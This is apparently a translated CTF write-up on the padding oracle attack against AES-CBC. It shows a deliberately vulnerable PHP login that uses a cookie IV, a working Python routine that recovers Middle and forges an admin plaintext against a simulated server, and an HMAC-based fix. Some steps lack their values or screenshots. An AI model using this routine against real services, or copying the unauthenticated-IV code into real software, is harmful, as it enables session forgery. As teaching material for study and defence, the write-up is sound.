Padding Oracle Attack

Source: Internet
Author: User
Tags: decrypt, sql injection

Recently, while reproducing an LCTF2017 challenge, I came across a padding oracle attack, which is also a kind of CBC bit-flipping attack. This attack mainly targets the CBC mode of encryption.

There are many blog posts about this attack online, but some of the details are either specific to the author or omitted, so I am going to go over the problems I ran into with this attack.

I wrote a CBC flip attack article before, but that article assumed the ciphertext and the IV were both known, and only one byte had to be flipped (flipping several bytes is also possible).

This padding oracle attack, on the other hand, is done knowing only the IV and nothing else, so I will start from there. We know that CBC mode encryption works like this:

An IV is generated randomly at the start; the first plaintext block is XORed with the IV and then encrypted; the resulting first ciphertext block is used as the IV for encrypting the second block, and so on.

Wu Hanqing's book "White Hat Talks Web Security"

describes a fixed intermediate value, which we call Middle; it appears under that name in other articles as well.

This attack is mainly about recovering this value and then deriving everything else from it.

Because of the following relationship:

original plaintext ^ original IV = Middle

new plaintext ^ new IV = Middle

This means that once we know Middle, we can change what the ciphertext decrypts to, because the new plaintext is something we construct ourselves.

When CBC mode is decrypted, we can work from the back (the last byte first), and the byte positions of the plaintext, the IV and Middle line up one-to-one.

Padding Type

For example, each of our blocks is 16 bytes long (AES-128-CBC, as in the code below).

If our plaintext is 15 a's,

then the plaintext that actually goes into the XOR is

aaaaaaaaaaaaaaa0x01

Note that the 0x01 at the end is a single byte with the value 1, written in hex, not the four characters "0x01".

Similarly, if our plaintext is 8 a's,

then the plaintext that goes into the XOR is

aaaaaaaa0x080x080x080x080x080x080x080x08

According to this rule, we can submit data to the server and let it decrypt automatically; if it decrypts without error, the last one or several bytes form a valid padding value.

This process is like blind SQL injection.

For example, we know that we can control the token (that is, the IV), while the other parameters are unknown.

When we submit the token, the program decrypts it automatically, and there are 3 cases:

1. The token is not valid and cannot be decrypted; the server reports an error.

2. The token can be decrypted, but the result is not the original plaintext.

3. The token is completely correct and the correct plaintext appears.

Based on the points above, we can proceed as follows: as long as the server does not report an error, the program was able to decrypt, which means the last one or several bytes are right. Then, from the IV we forged and the plaintext we forged, we can get the correct Middle (because Middle is constant: within one session, Middle stays the same).

For example: Middle is unknown, the plaintext is unknown, and the IV is controllable (the two unknowns live on the server side).

Because middle[15] = plaintext[15] ^ iv[15],

we need to know the Middle value; our forged plaintext is only one byte long at first, and that last byte must be 0x01.

We do not need to know Middle directly, because it lives on the server: we just supply the IV, the decryption function is called automatically, and if the IV we enter is 00000000000000000000000000000065,

then we know the last byte of Middle: middle[15] = 0x65 ^ 0x01, and this value is fixed.

Next, middle[14]. We now assume the plaintext ends in the two padding bytes 0x02 0x02 (in hex). Because the plaintext has changed, the IV byte for the last position has to change accordingly: iv[15] = middle[15] ^ 0x02.

The second-to-last byte of the IV is what we want to get next. Continue in the same way as above, brute-forcing that byte; as long as the server does not report an error, the decryption is valid, so we get that byte and therefore the second-to-last byte of Middle. Repeating these steps, we obtain all of Middle.

But our plaintext cannot be empty, so at least the first byte of the plaintext has to be guessed; that is, the first position of Middle can only be obtained by brute force.

Having obtained Middle, if we want the original ciphertext to decrypt to the data we want,

then according to the formulas

original plaintext ^ original IV = Middle

new plaintext ^ new IV = Middle

original plaintext = new plaintext ^ new IV ^ original IV

we only need to enter the new IV, and the decryption result is the new plaintext, which is the plaintext we constructed.
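The padding rules and the byte-by-byte procedure above, carried through in one runnable simulation. This is an added example, not the blog post's code: the server keeps Middle (the block-cipher decryption of the ciphertext block) as a fixed secret, which from the attacker's side is indistinguishable from a real AES-CBC decryption, so no AES library is needed; the class name VulnerableServer, the sample plaintext "guest" and the target "admin" are constructed for the demo. The example also handles the one edge case the post does not mention: a last-byte guess that accidentally produces a valid padding longer than 0x01.

```python
"""Padding oracle walk-through for one CBC block (added example; not the blog post's code).

The server keeps two secrets: the block-cipher decryption of the ciphertext block,
which the post calls Middle, and therefore the plaintext P = Middle ^ IV. The
attacker controls only the IV and learns one bit per request: did PKCS#7 unpadding
succeed? Because Middle is constant for the session, a fixed secret 16-byte value
behaves exactly like a real AES decryption from the attacker's side, so Middle is
modelled as a constant here (an assumption of this simulation, not the page's code).
"""
import os
from typing import Callable, Optional

BLOCK = 16  # AES-128-CBC block size, as in the post's PHP example


def pkcs7_pad(data: bytes, block: int = BLOCK) -> bytes:
    n = block - len(data) % block
    return data + bytes([n]) * n


def pkcs7_unpad(data: bytes, block: int = BLOCK) -> bytes:
    """Raise ValueError on any invalid padding; this is the check the oracle leaks."""
    if not data or len(data) % block:
        raise ValueError("bad length")
    n = data[-1]
    if n < 1 or n > block or data[-n:] != bytes([n]) * n:
        raise ValueError("bad padding")
    return data[:-n]


def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


class VulnerableServer:
    """Mimics test_identity(): plaintext = Middle ^ IV, then the padding is checked."""

    def __init__(self, plaintext: bytes, iv: bytes = b""):
        self._iv = iv or os.urandom(BLOCK)                   # the cookie 'token'
        self._middle = xor(pkcs7_pad(plaintext), self._iv)   # fixed per session

    @property
    def token(self) -> bytes:
        return self._iv

    def decrypt(self, iv: bytes) -> Optional[bytes]:
        try:
            return pkcs7_unpad(xor(self._middle, iv))
        except ValueError:
            return None  # the "Error!" branch: one bit of information per query


def recover_middle(oracle: Callable[[bytes], Optional[bytes]], block: int = BLOCK) -> bytes:
    """Recover Middle byte by byte from the back, exactly as the post describes."""
    middle = bytearray(block)
    for pos in range(block - 1, -1, -1):
        pad = block - pos                   # 0x01, then 0x02 0x02, then 0x03 ...
        iv = bytearray(block)
        for j in range(pos + 1, block):     # known positions: iv[j] = middle[j] ^ pad
            iv[j] = middle[j] ^ pad
        for guess in range(256):
            iv[pos] = guess
            if oracle(bytes(iv)) is None:
                continue
            if pos == block - 1:
                # Edge case: the last byte may have decrypted to 0x02 (with a lucky
                # 0x02 in front of it) rather than 0x01. Flipping the previous byte
                # breaks such a longer padding but leaves a genuine 0x01 intact.
                probe = bytearray(iv)
                probe[pos - 1] ^= 0xFF
                if oracle(bytes(probe)) is None:
                    continue
            middle[pos] = guess ^ pad
            break
        else:
            raise RuntimeError("no IV byte gave valid padding at position %d" % pos)
    return bytes(middle)


def recover_plaintext(middle: bytes, original_iv: bytes) -> bytes:
    """Original plaintext = Middle ^ original IV (the post's first formula)."""
    return pkcs7_unpad(xor(middle, original_iv))


def forge_iv(middle: bytes, wanted: bytes) -> bytes:
    """New IV = Middle ^ new plaintext (the post's second formula)."""
    return xor(middle, pkcs7_pad(wanted))


def demo() -> tuple:
    """Constructed scenario: the session plaintext is 'guest'; recover it, then forge 'admin'."""
    server = VulnerableServer(b"guest")
    middle = recover_middle(server.decrypt)
    original = recover_plaintext(middle, server.token)
    forged = server.decrypt(forge_iv(middle, b"admin"))
    return original, forged


if __name__ == "__main__":
    print(demo())  # (b'guest', b'admin')
```

Each position costs at most 256 oracle queries, so a 16-byte block is recovered in at most 4096 requests; the number is worth knowing because a burst of requests with one cookie byte stepping through all 256 values, paired with a stream of "Error!" responses, is exactly the pattern a web log review or a rate limit on decryption failures can pick up.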

Here is an example combined with code detailed analysis:

<?php
error_reporting(0);
define("SECRET_KEY", "******");   // the key is not known
define("METHOD", "AES-128-CBC");
session_start();

function get_random_token() {
    $random_token = '';
    $str = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz1234567890";
    // AES-128-CBC needs a 16-byte IV; the loop bound was lost in extraction and 16 is assumed here
    for ($i = 0; $i < 16; $i++) {
        $random_token .= substr($str, rand(1, 61), 1);
    }
    return $random_token;
}

function get_identity() {
    $id = '***';   // the original plaintext is not known
    $token = get_random_token();
    $c = openssl_encrypt($id, METHOD, SECRET_KEY, OPENSSL_RAW_DATA, $token);
    $_SESSION['id'] = base64_encode($c);
    setcookie("token", base64_encode($token));
    $_SESSION['isadmin'] = false;
}

function test_identity() {
    if (isset($_SESSION['id'])) {
        $c = base64_decode($_SESSION['id']);
        $token = base64_decode($_COOKIE["token"]);   // attacker-controlled IV
        if ($u = openssl_decrypt($c, METHOD, SECRET_KEY, OPENSSL_RAW_DATA, $token)) {
            if ($u === 'admin') {
                $_SESSION['isadmin'] = true;
            }
        } else {
            echo "Error!";   // decryption (padding) failure is visible to the client
        }
    }
}

if (!isset($_SESSION['id']))
    get_identity();
test_identity();
if ($_SESSION["isadmin"])
    echo "You are admin!";
else
    echo "False";
?>

This example is taken from http://f1sh.site/2017/08/04/%E5%88%9D%E5%AD%A6padding-oracle-attack/

The rough flow of the source is:

1. get_identity();

Generates a token, uses it as the IV of the encryption algorithm to encrypt the plaintext (which is unknown to us), and then sends the token in Set-Cookie.

2. test_identity();

Decrypts and then checks what the plaintext is; if it is admin, it sets

$_SESSION['isadmin'] = true;

3. if ($_SESSION["isadmin"])

If it is set, the output is You are admin!

Otherwise the output is False.

From this we know that the token value is controllable; by the analysis above, controlling the token (that is, the IV) lets us make the decryption produce arbitrary plaintext.
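The fix for the code above is to make sure the IV can no longer be chosen freely: authenticate IV || ciphertext and verify the tag in constant time before calling the decryption routine, or switch to an AEAD mode (in PHP: hash_hmac() plus hash_equals() before openssl_decrypt(), or openssl_encrypt() with aes-128-gcm and its $tag parameter). The following Python model of that hardened check is an added example, not the post's or the original site's code; the key, the stand-in ciphertext and the function names are constructed for the demo.

```python
"""Hardened token check (added example; not the blog post's or the project's code).

Mitigation modelled here: compute an HMAC over IV || ciphertext when the token is
issued, and verify it in constant time before any decryption takes place. A token
whose IV has been changed is rejected with the same response as every other
tampered token, so the padding check never runs on an attacker-chosen IV and the
oracle disappears. The key and sample values are constructed for the demo.
"""
import hashlib
import hmac
import os

BLOCK = 16
TAG_LEN = 32  # SHA-256 output length

MAC_KEY = os.urandom(32)  # constructed demo key; a second server secret next to SECRET_KEY


def issue_token(iv: bytes, ciphertext: bytes, key: bytes = MAC_KEY) -> bytes:
    """Token = IV || HMAC(key, IV || ciphertext); the ciphertext itself stays server-side."""
    tag = hmac.new(key, iv + ciphertext, hashlib.sha256).digest()
    return iv + tag


def check_token(token: bytes, ciphertext: bytes, key: bytes = MAC_KEY) -> str:
    """One generic response for every failure; 'decrypt' only for an untampered token."""
    if len(token) != BLOCK + TAG_LEN:
        return "rejected"
    iv, tag = token[:BLOCK], token[BLOCK:]
    expected = hmac.new(key, iv + ciphertext, hashlib.sha256).digest()
    if not hmac.compare_digest(tag, expected):  # constant-time, like PHP's hash_equals()
        return "rejected"
    return "decrypt"  # only here would openssl_decrypt run, and only with the genuine IV


def responses_for_last_byte_guesses(token: bytes, ciphertext: bytes) -> set:
    """What the post's byte-by-byte search would observe: all 255 other last-IV bytes."""
    seen = set()
    genuine = token[BLOCK - 1]
    for guess in range(256):
        if guess == genuine:
            continue
        iv = bytearray(token[:BLOCK])
        iv[BLOCK - 1] = guess
        seen.add(check_token(bytes(iv) + token[BLOCK:], ciphertext))
    return seen


def demo() -> tuple:
    iv = os.urandom(BLOCK)          # constructed stand-in for get_random_token()
    ciphertext = os.urandom(BLOCK)  # constructed stand-in for the encrypted id
    token = issue_token(iv, ciphertext)
    return check_token(token, ciphertext), responses_for_last_byte_guesses(token, ciphertext)


if __name__ == "__main__":
    print(demo())  # ('decrypt', {'rejected'})
```

The set returned for the flipped IVs contains a single value, which is the whole point: the search the post describes depends on telling "padding valid" apart from "padding invalid", and once every modified token is answered identically before decryption, there is nothing left to brute-force. The MAC must cover the ciphertext as well as the IV, so that a stored ciphertext cannot be paired with a foreign IV/tag either.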

Following the process above, step by step.

Writing the Python code

First get the PHPSESSID and token values.

Then construct a token and send it to the server.

First, we set all bytes to 0 and brute-force the last byte.

We obtain the last byte of our constructed IV, 3e, and the corresponding middle value is

Then continue with the second byte, having written down the value of middle.

We again construct all 0s, brute-force the second-to-last byte, and the last byte can be computed.

Then continue running the code.

We can see the page now displays False with no Error, which means we know the second-to-last byte of Middle; in the same way we can obtain all the remaining bytes of Middle.

The result of running the complete code:

Use the same session and token in the browser.

You can see that the login succeeded.

The detailed code can refer to my Github:https://github.com/niechaojun/padding_oracle
